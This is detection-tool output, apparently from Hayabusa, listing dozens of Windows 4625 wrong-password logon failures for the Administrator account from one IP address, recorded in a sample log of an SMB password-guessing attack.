2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rTxEVu7mudXEBARZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7ohqvCoOLkFRcqvE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: me8rikVJqcKxvHdq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oLqVmqCmHTrD7V8V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5ySdyzxvDasHgjq0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N2auwOc1wemq76n1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RgK6lHgC5WOBk4kW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2GG0bKgusKqseQij  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MpHm7DcOmhq4rkaX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OX1vVGrE7fJSMEiZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 65i7wtyAhL58QrzC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k8uSVFRTLTB6g1eg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ire6VOUMWZQnNjES  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pGWnvKUXnbJvRqql  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xBVvrrLf1rnAviKS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NE9atGNBlSLQLLcX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a0M5EaAXziu07hOH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PM1mwxqI7yVgoK2D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MPqnpvetHXdThxYg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gthbVQMJ7UD2QS7H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AwwJXCoC3gMDoDn7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ilNNoVbZpyhtsNkV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eNY0lv9IglfHP34d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BjSeQciwy17L7raV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wycE1fIsmPq9zaMU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5z1spxImm2ZlGOld  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dg7o4GCET1bJrlEU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E7Db3OLA0XPXL1B4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Uoqx5iPRp2tfYYos  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ixw5XWC2frtrTUkv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3v0NpzAp7io9gbZQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AfOOiR2zO5xem9Tk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yiGtitRqZbGNKrtN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7oQ70LvSMnGxBCFO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JGHr8623vHZyMY5B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X5Y1C9A4XqxQGoVA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SOnirLGOZzRVSt3y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jLu7XtYCHPqVNE7u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w242Ei1CpWErEE4m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UOZUagVG4R6zcK92  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7hQOl8XV3Ydp8UcW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u1XBRDfoN0I2iu6L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ngyknhk7uGvs38bG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QXZUhLVsfRUBDcsu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VEDAtkhiSqUcLj2i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M4CmH02M91kHzeK2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5St1kWrKP4PZlOIy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 17A6k4Om84gunQfB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y9GfR4XdixrNJHny  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 27JWPfEV4DgS1tNv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yNeJnXg1pyedSpqU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WWihv14n9IAQXw2X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Gy19bFWzQFaQZRBa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N28Ec4jkXkSNvsQ1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sD9qQWJbeukyPQbc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uoRSHXvwMeKg8cyQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bPEOhloL7vo1fTFQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: glbLglffka5JqQCN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7MTbgvYN6PIaKxeK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tAjWfgmGrm3o2mAx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9EZYPG6uQtsez1UI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PRcnsdLAKd7enemG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OUZEQaUavv7fWk4w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JKth56VEMqMCgwG9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TCGlvOFFkVpSHSoM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jmLxSIastsvqdJC8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IPyvUDHHWzbhyvZE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S7dF4fIlAvIBYiw0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bPDPtH2m9TgW8Khg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AChGHCNom0ds5ujV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8sLQI4KGgQRq2Sy9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dqeLFLRT5EXiCBUC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dx3tco9up7XnOa7h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
